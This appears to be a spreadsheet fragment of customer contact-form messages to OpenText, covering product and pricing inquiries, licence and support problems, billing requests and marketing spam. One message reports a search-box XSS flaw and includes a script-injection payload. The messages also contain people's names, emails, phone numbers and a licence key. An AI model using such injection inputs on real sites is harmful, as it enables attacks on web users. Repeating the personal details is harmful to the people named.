    <t xml:space="preserve">I am wondering if Nexen has an OpenText Customer Support Contract in which I can use. I need to build a webservice for Livelink. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
_x000D_
I'm looking for:_x000D_
_x000D_
Forensic Tools_x000D_
EnCase Forensic 8.05 + EnCase Mobile Investigator_x000D_
Stellar Phoenix Data Recovery Toolkit_x000D_
CodeMeter  CmStick ME USB Dongle_x000D_
2 TB External HDD_x000D_
Video Camera PEN_x000D_
8GB Digital Voice Recorder_x000D_
</t>
  </si>
  <si>
    <t>I am changing jobs and need to change my EnCE contact information. My EnCE information is attached to either matthew.gayford@schwab.com or mattgayford@live.com. I need to switch it to MatthewCGayford@gmail.com. My last renewal was in March of 2017. Thank you.</t>
  </si>
  <si>
    <t>In recent days I received a licenced key for encase forensics but, I am not able to install it. In the proceess of submiting the instalation file the page does not let me download it._x000D_
I am in the process of certification in the second part._x000D_
_x000D_
Thank you for your support._x000D_
_x000D_
Order Information_x000D_
Access to this software update is based on the following order and dongle (or security key) IDs:_x000D_
_x000D_
Order Number:	1346782_x000D_
License Key (serial #):	EnCEe: X100008122786;_x000D_
_x000D_
To activate your EnCase electronic license:_x000D_
(applies to key(s) - X100008122786 )</t>
  </si>
  <si>
    <t>We have a client that is utilizing an old version of Right Fax that is running on an old server._x000D_
They would like to obtain pricing options for an updated RF version.</t>
  </si>
  <si>
    <t>Hi! I am working on the big client proposal, which involves documentum products as part of the solution we present. Can we please have a call to discuss the proposal and potential partnership? _x000D_
Thank you,_x000D_
Inna Babenko</t>
  </si>
  <si>
    <t>Hello all,_x000D_
can you please provide us with an official quote of following item? We are acting as a reseller und we would like to resell product mentioned below. Hence we´d appreciate if we could be granted with some discounts. Please carefully read following text block._x000D_
Please always send us additional information which are very important to us._x000D_
Full description of product:_x000D_
Your part number (SKU):_x000D_
Type of license (CD/DVD or electronic):_x000D_
List price:_x000D_
Discounted reseller price (our price):_x000D_
Shipping cost (if mandatory):_x000D_
Terms of payment:_x000D_
Method of payment:_x000D_
How to order:_x000D_
Terms and conditions:_x000D_
EULA:_x000D_
So here is the requested product:_x000D_
128x_x000D_
OpenText Exceed_x000D_
End customer: Universität zu Köln - DER KANZLER_x000D_
Type of enquiry: Tender to bid _x000D_
Submittal of quotation: 03.09.2018_x000D_
Binding period: 14 / 30 days _x000D_
Thank you in advance for your assistance and support.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I wanted to enquire about signing up for your catalogue. We are a fashion jewelry company working with Nordstrom and Saks Fifth Avenue. How long does it take to setup an account? What are the costs?_x000D_
Thank you,_x000D_
Alina</t>
  </si>
  <si>
    <t xml:space="preserve">Att: Zoe Winn,_x000D_
Please would you be able to contact me on the email above regarding nomination for Management Team in our Thames Valley Business Magazine Awards 2018._x000D_
Kind regards_x000D_
Pauline_x000D_
</t>
  </si>
  <si>
    <t>Would like to purchase Redact-It Desktop v16.3. Only need redaction functionality so would not need Brava Desktop product. I have installed a trial license on a PC and would like to purchase a node license for this machine.</t>
  </si>
  <si>
    <t>Hi OpenText team,_x000D_
_x000D_
we would appreciate it if you could help us with the following questions:_x000D_
_x000D_
1. In which editions, if any, is Exceed 15 available?_x000D_
2. Do you offer different licenses for different languages (English, German etc.)? Or does one license cover all available languages?_x000D_
3. Do you offer different licenses for different platforms (Win, Mac) or are your licenses cross-platform?_x000D_
4. Could you please provide the ECCN to your products, if available?_x000D_
5. In general, do you use SKUs for your products? If so, could you provide a current SKU/price list?_x000D_
_x000D_
Many thanks in advance. If you have any questions, please feel free to contact us._x000D_
_x000D_
Tim</t>
  </si>
  <si>
    <t xml:space="preserve">I would like timing and pricing on a training class for Content Suite. </t>
  </si>
  <si>
    <t>I need rightfax</t>
  </si>
  <si>
    <t>Interested on your Application Extender solution</t>
  </si>
  <si>
    <t>Buongiorno mi chiamo Rossana e scrivo dalla società INJOIN TECHNOLOGY SOLUTIONS SRL di Roma Italia (sede operativa a Sesto San Giovanni-Milano). Vorremmo partecipare ad una gara pubblica per rinnovo di 84 licenze EnCase Forensic per 36 mesi. Vorrei sapere se possiamo diventare partner per avere da voi miglior offerta. Attendo vostro _x000D_
 gentile riscontro.Grazie</t>
  </si>
  <si>
    <t>Trying to get download of software to fix issues we are having with computer software is on.  The person who knew our customer portal information is no longer with the company so can't access the software through the customer portal..  Our account number is US01-34440</t>
  </si>
  <si>
    <t>Dear all, _x000D_
We have sent a request to send a memo via fax yesterday. This request was sent to  fax@csp.faxmail.com  from our investigator.services@eurofins.com email address.  Usually such requests were placed by Kitty Hermans &lt;KittyHermans@eurofins.com&gt; on behalf of our department, but her position in the organization was changed._x000D_
Unfortunately we did not receive a confirmation/either rejection of the request._x000D_
May I kindly ask you to look into this urgently?_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Natalia Ketterink - Goncharenko_x000D_
Team Leader Investigator Services &amp; Reception</t>
  </si>
  <si>
    <t>Looking for large archiving platform replacement.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
We are looking to replace our existing document management system for the delivery of a capital project (20-30m range) and would like to discuss if documentum is a viable option for this and future projects. Thank you. TJ_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Hi there,_x000D_
We are after a cloud based service that can catalog our large database of photos._x000D_
Is this a service you can provide? _x000D_
Thanks,_x000D_
Tibor</t>
  </si>
  <si>
    <t>We are interested in a good solution to have remote acces to our X Window graphical applications and desktops running on Linux workstations.</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Do you look forward for some out of the box web design? _x000D_
_x000D_
We can help you with our amazing web design service under very economic price. _x000D_
_x000D_
Get in touch with us to explore more about our web design services._x000D_
_x000D_
Thanks_x000D_
Russ</t>
  </si>
  <si>
    <t>Is it possible to recover deleted videos form samsung note 8 with Android 7.1.1?_x000D_
The phone is unrooted._x000D_
Recently deleted ˜7 videos and 50 photos._x000D_
Deleted videos are ˜4Gb per video</t>
  </si>
  <si>
    <t>Implementing a finance automation program focussing on Invoice Matching</t>
  </si>
  <si>
    <t xml:space="preserve">We have a customer that needs ECM for 1000 users and 35 million document to be scanned within 12 months </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested to AS400 Users?_x000D_
_x000D_
We have 1112 Ready-to- buy leads of Dynamics AS400 Technology Customers Records from California._x000D_
_x000D_
We can provide Test file without any obligations. let me know your interest on the same_x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>We would like a demo on Document Management System</t>
  </si>
  <si>
    <t>EnCase licence retrieval</t>
  </si>
  <si>
    <t>It would appear that your organisation taken over the operations of Hightail? Has my Hightail facility 'evaporated' somehow?</t>
  </si>
  <si>
    <t>I am in the process of the second part of an encase certificate exam. I was trying to activate the encase software for the second part exam, but the process stops  because I can´t get the Licence Activation File.  This is my license Key that I received by email: X100008122786.</t>
  </si>
  <si>
    <t>Bank is interested to implement ECM , please contact me back via company email or +66 26388322</t>
  </si>
  <si>
    <t>Hello - We are in process of becoming a Nordstrom vendor, and would like to learn about the process &amp; costs of establishing our eCatalog with OpenText.  Thank you</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous utilisons le système de GED DOCUBASE de TESSI depuis 10 ans. Nous sommes à la recherche d'un nouveau système de GED._x000D_
Notre système contient actuellement 20 millions de documents répartis dans 7 bases._x000D_
Entre 400 et 800 utilisateurs y sont connectés chaque jour._x000D_
Que proposez vous ?_x000D_
_x000D_
Merci pour votre réponse._x000D_
_x000D_
Cordialement,_x000D_
Pierre Lebrun</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am looking for an OpenText product which can do content indexing.  _x000D_
We have many numerous folders running into Terabytes of storage.  Each folder has thousands of documents (PDF, WORD, text, etc).  We need a product which should primarily:_x000D_
    - does document content indexing_x000D_
    - search for keywords should return all the documents that has the keyword in it._x000D_
 We are expecting the product to do just this stuff and would then consider the duration of usage of the product.  It would be great if you can recommend a product which has a specialization in document indexing of the files in the folders._x000D_
_x000D_
Regards,_x000D_
Chandra</t>
  </si>
  <si>
    <t>Dear recipient(s),_x000D_
_x000D_
I am currently working in a major consultancy project for a public sector organisation in Finland. The work covers evaluation of business intelligence/analytics tools on behalf of our client._x000D_
_x000D_
A major requirement by our customer is to use the tool as deployable to private cloud of client's choice (on-premise or hosted)._x000D_
_x000D_
Public cloud is not an option, as our customer needs to have private (aka internal) cloud and preferrably located in Finland. _x000D_
_x000D_
Question: do the OpenText Analytics offerings provide related option(s) i.e. the options which would be deployable in a private cloud of client's choice? _x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">I wish to cancel my account. Please take my name from your list - if it is still there._x000D_
Cheers,_x000D_
Dr Jenny Close_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Is Team Developer 6.0 compatible with SQL Server Native Client 11.0_x000D_
_x000D_
Thanks_x000D_
_x000D_
Chris_x000D_
</t>
  </si>
  <si>
    <t>Looking to evaluate OpenText Document for our doucmentation. please call on my cell 408 859 7505</t>
  </si>
  <si>
    <t>Hi there._x000D_
_x000D_
Just a quick query - do applicants who submit for positions advertised with OpenText receive a confirmation or rejection notice within a certain time-frame?_x000D_
_x000D_
Thanks_x000D_
_x000D_
David</t>
  </si>
  <si>
    <t>We are upgrading our Exstream platform and need access to the current MQ Connector files.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Hope you’re doing great!_x000D_
_x000D_
We understand that you are providing Supply Chain Management Software Solutions and services to various small, mid-size and large businesses._x000D_
 _x000D_
Would you be interested in acquiring our recently verified Supply Chain Management Software User’s database?_x000D_
_x000D_
For your benefit we have listed few SCM product below:_x000D_
	GEP_x000D_
	PTC_x000D_
	Zycus_x000D_
	Ariba_x000D_
	e2open_x000D_
	Perfect Commerce_x000D_
	Kinaxis_x000D_
	Jaggaer_x000D_
	Kewill Systems_x000D_
	SciQuest_x000D_
	Manhattan Associates_x000D_
	Descartes Systems Group_x000D_
	Coupa_x000D_
	Basware_x000D_
	Many more Across the world..._x000D_
_x000D_
List includes: First Name, Last Name, Title, Email Address, Company, Address, City, State/Province, ZIP/Postal Code, ZIP4, Country, Phone, Fax, Employees, Sales, SIC Code, Primary Industry, NAICS and Web Address._x000D_
 _x000D_
Please let me know your thoughts, thanks for your time and we hope to hear from you soon._x000D_
 _x000D_
Best regards,_x000D_
Lincy Caroline _x000D_
Technology Marketing Specialist_x000D_
 _x000D_
If you do not wish to receive future emails from us, please reply as 'leave out’_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi, this is Alex Steiner from Microtech. Could you please provide me with a POC to request a quote for SEWP RFQ #100851 as soon as possible? All pertinent details – including contact information – are attached/below. Thank you and please let me know if you have any questions._x000D_
Alex Steiner_x000D_
Sales Associate at Microtech _x000D_
8330 Boone Blvd # 600, Vienna, VA 22182_x000D_
571-327-2924</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to access the support portal for Encase and it says that my email is not confirmed and that I don't have access to submitting support requests. Our support contract should still be active. This is my first time accessing the support portal since the transfer from Guidance to OpenText. What do I need to do in order to be able to access the support portal? </t>
  </si>
  <si>
    <t xml:space="preserve">Issues with saving PDF files. After inserting a file into the current PDF, then clicking save and closing out of the document, the user goes back into the document and the inserted file is no where to be found. Checking history of the document shows the document was accessed but was not saved even though the save button was used. </t>
  </si>
  <si>
    <t>have an account who needs 11 lines and does approxiamatley 40 pages a month per line of incoming faxes.  Not looking to make anything, just take care of a good account</t>
  </si>
  <si>
    <t>Please switch file format to PDF. _x000D_
Thank you</t>
  </si>
  <si>
    <t>3-0177 What's New in OpenText Content Server v16.2_x000D_
Need Governance price for this traning. I'm looking to take this traning Sept. 11_x000D_
Please send me the price without price thks_x000D_
Marc</t>
  </si>
  <si>
    <t>We are currently a RightFax customer but would like to expand/add to our current suite of  RightFax products.  Can someone please email of call me?  _x000D_
_x000D_
Thanks,_x000D_
Nancy</t>
  </si>
  <si>
    <t>Need ability to open support tickets on my login. Customer ID:501976189 PSN 4129148801 &amp; 412906211. Thanks.</t>
  </si>
  <si>
    <t>Looking at OpenText as a VAN for transmitting and receiving with US Customs via MQ. Please have a sales person reach out to howood@itscustoms.com to setup an appointment to discuss. Thank you, Harry</t>
  </si>
  <si>
    <t>We are implementing and RFI/RFP process and would like to invite Opentext to participate.</t>
  </si>
  <si>
    <t>I cannot access the GXS Catalogue, Network ID R6396. I tried resetting the password few times but still won't let me log in. Kindly assist to resolve the issue ASAP.</t>
  </si>
  <si>
    <t>One week ago I wrote mail to andreas.gottwald@opentext.com and margit.koenig@opentext.com with questions. I didn't receive any answer. My question is: "I need your advise about integration eDocs DM and SharePoint. On OpenText site I found four variant of integration. Could you inform me additional information about this solutions, license and prices. Is it possible to test this solutions?"</t>
  </si>
  <si>
    <t xml:space="preserve">Information, availability and quote for the DF 220 Navigating Encase version 8, 3 day course at Reading on the 25 September 2018 please. </t>
  </si>
  <si>
    <t>I am a Hightail subscriber and I can't login using Hightail. I've signed up to Opentext - but where is my account? I simply want to send large files now.  This is urgent.</t>
  </si>
  <si>
    <t>WHAT HAPPENED TO MY HIGHTAIL ACCOUNT?!</t>
  </si>
  <si>
    <t>I have requested a W-9 from you twice using the billing address on your invoice.  I need it before I can pay your invoices.  Is there some reason you cannot sent me a W-9?  This doesn't seem like a difficult request.  Surely you get requests like this all of the time.  Please advise.</t>
  </si>
  <si>
    <t>Hello, we would like upgrade our old eDocs DM software to a latest version and put in AWS environment. Please help us with that. Thank you</t>
  </si>
  <si>
    <t>Upic Solutions is a 501(c)3 non-profit supporting United Way back office needs, including pledge processing. One way we help United Ways is by keying pledge forms into their backend systems. OpenText Teleform looks like it could be an ideal option to streamline the process. Can I get an idea of what the cost would be for a non-profit?</t>
  </si>
  <si>
    <t xml:space="preserve">I have a major project that I would like to speak to someone about. </t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
This is Nayan Goswami here. Well, I am an SEO Consultant, Link Builder expert with more than 2 years of online marketing experience. I am always on time and while I am often quick at my work I always deliver quality work.I can publish your guest posts on quality sites and create engaging content for your website. _x000D_
_x000D_
I will post your article to my High Domain Authority 2000+ blogs. If you prefer I can write the post for you, just purchase an add-on. _x000D_
_x000D_
Here I'm sending you some sites that you want to take a look at:_x000D_
_x000D_
(1)smartdatacollective.com_x000D_
(2)jeffbullas.com_x000D_
(3)sociableblog.com_x000D_
(4)fxempire.com_x000D_
(5)dezzain.com_x000D_
_x000D_
If you have any question about my service then Please get in touch and we will discuss more details. I look forward to your questions and communications._x000D_
_x000D_
Respectfully!_x000D_
Nayan</t>
  </si>
  <si>
    <t>We are interested in a subscription for Fax2Mail.</t>
  </si>
  <si>
    <t>Currently using Streamserve to develop some reporting &amp; need some consulting expertise to assist</t>
  </si>
  <si>
    <t>We received a PSInvoice 9000658041 but it doesn't reference a valid purchase order nor any other information such as who at Webasto requested this service be done. Also we do not have your company set up in our system to process payments to.  Please advise with any other information you may have to help us identify who is responsible for this invoice.  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am not able to access my open tickets. I am not able to see the tickets I have opened. </t>
  </si>
  <si>
    <t>I attempted to use the fax twice today for the first time. It was rejected with the following message:_x000D_
_x000D_
You need to be authorized to use this service._x000D_
Authentication failed_x000D_
_x000D_
Can you help me?_x000D_
_x000D_
Thank you!_x000D_
Shannon Paswater</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
we have a project about ECM and BPM. we are considering SharePoint and OpenText._x000D_
Could you please connect back to us with technical documents._x000D_
_x000D_
Thanks,_x000D_
Hoang Do_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
i found xss vun on ur web app   (Search Box)_x000D_
 if u click on This link Xss Pop up will work _x000D_
so if u use this Payload into search box xss will work _x000D_
over"&gt; &lt;script&gt;alert('XSS')&lt;/script&gt; over_x000D_
Thx...._x000D_
</t>
  </si>
  <si>
    <t>Trying to get training on a product that was HP Exstream that our company uses.. thanks</t>
  </si>
  <si>
    <t>We would like to move off our RightFax 10.5 to a newer version and was wondering if we could get pricing on the licensing as well as pricing if there was a service that OpenText could provide to help us with the install process. Ideally we would like to rebuild the system instead of doing an in place upgrade. _x000D_
_x000D_
In Summary: _x000D_
1) Pricing on the newest version of RightFax_x000D_
2) Does OpenText provide any sort of installation service and if so, we would like to start engaging with them so we can work out pricing there as well. _x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>a client is using your software and was wondering which version of Laserform do you integrate with so I can give this to the client</t>
  </si>
  <si>
    <t>I am receiving chargebacks from Stage stores and can't login to see the reason why. I think it has something to do with the UCC 128 label</t>
  </si>
  <si>
    <t>as Team Manager of Altran Italy i'm in charge of the business develop of strategic customers on Energy market sector._x000D_
_x000D_
We are evaluating the opportunity to upgrate our skills includinig skills and competencies on OpenText products (Configuration, Solution Architect and Developer), either by a pecific support or by specific training for our collegues._x000D_
We really appreciate if you can contact me in order to explain better our needs and our views and define togheter how to proceed._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Mauro Valli_x000D_
_x000D_
**********************************_x000D_
Mauro Valli_x000D_
Advanced Expert [Pre-Sales Engineer]_x000D_
Altran Italy - Via Tiburtina 1232_x000D_
00131 Roma - ITALY_x000D_
Tel. : +39 06 4521 2020_x000D_
Mobile : +39 340 0851830_x000D_
**********************************</t>
  </si>
  <si>
    <t xml:space="preserve">Evaluating solutions available in the market place for our client (global organization), they are looking for eCommerce/EDI solution provider. </t>
  </si>
  <si>
    <t xml:space="preserve">Is there going to be an EnFuse conference next year?I have not been able to locate anything about the 2019 conference. </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Nous sommes une société revendeur basé en France. Pouvez-vous nous envoyer une offre pour un de nos clients : Licence Exceed 1-200 users. Merci beaucoup d'avance._x000D_
Cordialement </t>
  </si>
  <si>
    <t>Problem with a open service request</t>
  </si>
  <si>
    <t>To work on latest technologies</t>
  </si>
  <si>
    <t>Перезвоните по номеру 74993224685 Антон.</t>
  </si>
  <si>
    <t>Can be generate copy of invoice for TT payment</t>
  </si>
  <si>
    <t>Hi, I want to know whether Exceed 15.0.5(terminal emulator) supports TLS 1.2 version or not._x000D_
Please respond to above query as early as possiable</t>
  </si>
  <si>
    <t>Would like to have some contact from OpenText in Poland to talk about products to use for financial outsourcing services</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Concern,_x000D_
_x000D_
We are company exist in Oman Muscat if you offer your Services in Oman then we need Document Scanning as well as Archiving please contact me on my number for further details you can all me 9:00 AM to 4:00 PM_x000D_
_x000D_
Thanks_x000D_
Hashim Raza_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>error: could not create an account_x000D_
when: developer.opentext_x000D_
_x000D_
I am trying to create a new account to get access to information about Appworks</t>
  </si>
  <si>
    <t>We are contacting you because we have a client interested in two licenses of Encase Forensic V8. Thus we would like to ask you if you can quote us it please with your best price and delivery time._x000D_
Due to the urgency of our client a prompt answer will be appreciated even if negative._x000D_
_x000D_
Best regards,_x000D_
Lilia Ribeiro_x000D_
Sales department</t>
  </si>
  <si>
    <t>Explore oppurtunity  of OCR for invoice processing in SAP</t>
  </si>
  <si>
    <t>Ich brauche dringend Frau Probst. Wir haben schon eine Urgenz von unserem Kunden Hofer vorliegen....Wir sollten das onboarding fertig stellen, brauchen dazu aber die Unterstützung von Euch.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am Vishwanath from Mphasis, I am part of Industry solution group for Banking and Capital Market._x000D_
 _x000D_
We are exploring products in the area of data extraction (unstructured data), who could partner with us in building tech integrated solutions especially for the document intensive functions in banking and Capital Market, I came across your product and based on the information provided in your web portal, I believe the product could be explored to be part of  our overall service transformation solution_x000D_
 _x000D_
Besides building solutions for new customer acquisition, We were also looking products to improve efficiency of our existing operations/Customer, where we provide back office services to banking and insurance, especially in legal remediation process, KYC, customer on-boarding, Trade finance etc _x000D_
_x000D_
We request for a demo of your product, Can you please let us know a time and date for the demo._x000D_
 _x000D_
Note: I am based out of Bangalore, India_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I need know the reporting tool or a BI tool that you have and one time pricing of that solution. I found that there is a Product based on BIRT</t>
  </si>
  <si>
    <t>download about the software</t>
  </si>
  <si>
    <t>Good day,_x000D_
I am trying to download the Documentum IRM Client for PDF the following one IRM Client for PDF v5.1 SP2 (English – for Adobe 9.5, 10.1.2 and 11) – Mac. However the link is not working and nothing can be downloaded._x000D_
Can you please let me know how to access it._x000D_
Best Regards_x000D_
Marc</t>
  </si>
  <si>
    <t>can someone contact me tomorrow it is very important......</t>
  </si>
  <si>
    <t>We had a subscription with Hightail that we emailed to cancel 06/16/18, and then a charge for the annual renewal was placed on our Amex 06/30/18 on our 7/29/18 Amex bill.  We need this $159 charge to be refunded and our account closed as we had requested.  We no longer have a need to send radio program files and do not need to renew this service.</t>
  </si>
  <si>
    <t xml:space="preserve">need access to download remittance </t>
  </si>
  <si>
    <t>Needing a quote on RightFax ASAP.  Thanks!</t>
  </si>
  <si>
    <t>Looking to replace Fax lines with a Fax server.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Quick question – Interested in acquiring Dreamforce Expo Attendees List._x000D_
_x000D_
We have got 146,782 contacts of Salesforce Users and IT Professionals who are attending Dreamforce Expo, these contacts are decision makers who can eventually help your business grow_x000D_
_x000D_
Information Available: Decision Makers Name, Job Title, Direct Email Addresses, SIC Code, Phone Number, Fax Number, Company Name, Website Address, Physical Address with City, State, Country and Zip Code, Revenue Size, Employee Size, Industry etc._x000D_
_x000D_
The list can be used for Booth Invites, Appointment Setting, Networking and also for your Marketing initiatives._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Levan Saradjev, I am Service Development Manager at Orient Logic._x000D_
Orient Logic is one of the leading IT systems integrator in Georgia since 1995._x000D_
We are interested in your products and partnership, please give me contact information for person who representative in my region._x000D_
_x000D_
Best Regards,_x000D_
Levan Saradjev_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>On our bill, the previous office manager is deceased (Cheryl Kelly) would you kindly take her off of our billing statement and replace it with Attn: Jessica McClelland.  If you have any questions, please free to call me at 718-830-5605.</t>
  </si>
  <si>
    <t>I would like to speak to someone about their cloud fax options as a replacement to Rightfax</t>
  </si>
  <si>
    <t>We need the most recent PO number to give to our legislature to get our renewal approved. Right now we have last years PO number (18-0227). Anything you can do would be greatly appreciated.</t>
  </si>
  <si>
    <t>What are the determining factors to add my step-daughter to my current insurance?_x000D_
_x000D_
 _x000D_
 _x000D_
She is under 23 and lives with myself and her mother._x000D_
_x000D_
She has lost her benefits outside of Opentext.</t>
  </si>
  <si>
    <t xml:space="preserve">We have two accounts, MKK and baldwinsun.  we no longer need to use baldwinsun.  Please close this account. </t>
  </si>
  <si>
    <t>Hello,_x000D_
this is the third time i am trying to get into touch with opentext regarding the purchase of gupta developer. at least point me to a partner._x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>I'd like to know the following as soon as possible:_x000D_
1. please tell me about your letter/doc generation tool? _x000D_
2. Security?_x000D_
3. Formats and devices?_x000D_
4.tell me about doc creation and document inventory_x000D_
5 Tracking of version control and creator??_x000D_
6.ability to build and map to datapoints? (many systems have hard coded data.. is your flexible to pull in current data point?)_x000D_
7. Fullfillment - SMS, email, etc?</t>
  </si>
  <si>
    <t>I have lost my access to create technical support tickets with Opentext. It asks me to confirm registration through email link. I attempt to do so but, ultimately land to No access page. I need my access back please at earliest.</t>
  </si>
  <si>
    <t>Please send me a copy of your W9</t>
  </si>
  <si>
    <t>I need a quote for the purchase of 10 new licenses of EnCase Forensic Edition Software.  Each license will need the encryption support suite. Please send the quote to durden_marcus@bah.com.  Thanks! Marcus D.</t>
  </si>
  <si>
    <t>Hi,  Can someone please contact me regarding some part numbers we have questions around?  We are working on standardizing some parts and need some clarification as we're not able to find any information on these._x000D_
_x000D_
Please respond._x000D_
_x000D_
Thanks,_x000D_
Gina Bison_x000D_
Insight - SAM Consultant</t>
  </si>
  <si>
    <t>I will support BNS</t>
  </si>
  <si>
    <t>Perspecta wants to explore partnering with you on a federal government RFP.  Please provide a point of contact to receive our request for a non-disclosure agreement between our companies. _x000D_
_x000D_
•	Name_x000D_
•	Title_x000D_
•	Address_x000D_
•	Phone_x000D_
•	Email_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
je souhaiterais obtenir la documentation pour Opentext Content Services.</t>
  </si>
  <si>
    <t>Hi, I was wondering if you could send me some technical information on your solution OpenText Regulated Documents, we are currently designing a eDMS and found this solution.  I want to see if this can be installed on-prem (in house) and what would be cost and system requirements (Hardware/Software/OS) etc._x000D_
_x000D_
I also wanted to see if you can include documents or articles on development or developer tools that you have for this offereing (API's, customization options, integration with other applications)_x000D_
_x000D_
Please do not hesitate to contact me by email or by my mobile_x000D_
Thanks_x000D_
Cormac</t>
  </si>
  <si>
    <t>issues with new Tableau Forensic device</t>
  </si>
  <si>
    <t>What is the correct email address to send faxes?</t>
  </si>
  <si>
    <t>Trying to understand what function / service you are providing Open Solutions.</t>
  </si>
  <si>
    <t>Would like to know the licensing cost for Analytics</t>
  </si>
  <si>
    <t>Looking into EDI.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Documentum Team,_x000D_
I have some questions about the Doumentum training. _x000D_
On December 10th, 3 training courses will take place at the same day. _x000D_
Are there different instructors available for the non-Virtual Classroom courses (see 3-8011 Documentum System Administration Fundamentals)?_x000D_
When will the Training 3-8010 Documentum Technical Fundamentals v16.4 be available?_x000D_
</t>
  </si>
  <si>
    <t>Needing a quote for RightFax</t>
  </si>
  <si>
    <t>I need to purchase a license for another copy of Trusted Link Windows/Bizconnect._x000D_
_x000D_
Currently we have the following license:_x000D_
_x000D_
Pack id: 00138158-419020201</t>
  </si>
  <si>
    <t>I downloaded the app to create a watermark, which I need in 36 minutes. I NEED HELP NOW</t>
  </si>
  <si>
    <t>We are about to implement Oracle Cloud here at Titan and are in need of a faxing option. This will be for both outbound and inbound faxes. Can you send me some information on this will some possible pricing?_x000D_
Thanks,_x000D_
Mike</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am looking for a Content Management system to replace our files shares to better keep track of documents and versions and also for security so we can track access to documents. I would like to discuss this further and also request a quote. This is something we are planning on working on next year._x000D_
_x000D_
Qazi</t>
  </si>
  <si>
    <t>Hello Sir/Madam,_x000D_
_x000D_
Hope you're having a great day!_x000D_
_x000D_
Myself Daniel,from an Internet Marketing Company._x000D_
_x000D_
I would like to tell you some points about your online business. I hope  you won’t mind spending only 2-3 minutes to have a look at the following lines:_x000D_
_x000D_
It seems you've been spending budget with sponsored listing or PPC._x000D_
_x000D_
. In PPC, you may get the sales but only after paying a certain amount  every time and if you stop paying, then the sales will be vanished soon._x000D_
_x000D_
 . In SEO, You need to spend budget for few months. Once keywords will be in first page of Google, you can get satisfied traffic for long time._x000D_
_x000D_
. 90% of users like Organic results over the sponsored ones because these results are more relevant and valuable. So just imagine how many valuable customers you are losing by not focusing on organic search results._x000D_
_x000D_
By investing a few months in SEO, you can see drastic changes in your website internally and externally. We'll show you TOP Rankings in your keywords, link popularity, organic traffic and many more..._x000D_
_x000D_
After reviewing your website. I noticed some major on-page and off-page issues need to be fixed soon. For more information about your site errors, please respond to my email._x000D_
_x000D_
I would be happy to provide you Complete Site Analysis Report (free of cost) with our Company Profile, Work Experience and Client Testimonials._x000D_
_x000D_
Our main AIM is customer satisfaction. We are not like others. We've limited customers and make it sure they are really happy with our performance._x000D_
_x000D_
You may be interested with Big Big Companies but I can say they're taking money only showing their company brand to customers; otherwise the result part is Zero. Decision is yours!_x000D_
_x000D_
We wish you the best of luck and looking forward to a long and healthy business relationship with you and your company._x000D_
_x000D_
Waiting for your positive response…_x000D_
_x000D_
Best Regards,_x000D_
Daniel Jason_x000D_
------------------------------------- _x000D_
Business Development Manager_x000D_
New York 11801, USA_x000D_
Skype</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir benötigen dringend Support von Ihnen. Wir haben einige Mitarbeiter die massive Probleme haben, bei den wir ausschleißen können, das es anserer Konfiguration oder am Betriebssystem liegt_x000D_
Folgende Probleme sind aufgetreten:_x000D_
1. Es lassen sich keine .eml-Dateien mehr über den Opentext Imaging Viewer öffnen. Fehlermeldung ist: Keine Anwendung gefunden, die Dateien öffnen kann._x000D_
2. Beim Blättern von PDFs im OT Imaging Viewer werden alle Fenster geöffnet, die nicht minimiert sind._x000D_
3. Probleme mit Exchange Link. Bei einem User kommt esfast täglich vor, dass irgendwann am Tag keine E-Mails aus Outlook mehr an SAP Aufträge etc. archivieren kann. (Das SAP Pop-UP wohin etwas archiviert werden soll , erscheint erst gar nicht.)_x000D_
Vielen Dank_x000D_
Mike Bluhm</t>
  </si>
  <si>
    <t>Having issues with DM Client after upgrading DM from 5.3 to DM 10 and with Windows 10 Build # 1803</t>
  </si>
  <si>
    <t>Enquiry for Encase forensic v8</t>
  </si>
  <si>
    <t>Good morning_x000D_
a customer of mine requires the renewal of the maintenance of the following products_x000D_
_x000D_
Hummingbird DM: _x000D_
	N.l eDocs DM Server _x000D_
	N. 150 eDocs DM Standard Named User Client _x000D_
	N. 1 Lic DM HTML Rend Srvr Hummingbird SearchServer: _x000D_
o N. 100 eDocs KM Search Server Client Linux _x000D_
_x000D_
Can I have a quotation or do you have any references in Italy?_x000D_
Best reguards_x000D_
Fabio Della Vedova</t>
  </si>
  <si>
    <t>following mail for training enquiry wa sent on  Aug 23 and then again followup mail was sent on Aug 24. _x000D_
_x000D_
Can you please respond to below request._x000D_
------------------_x000D_
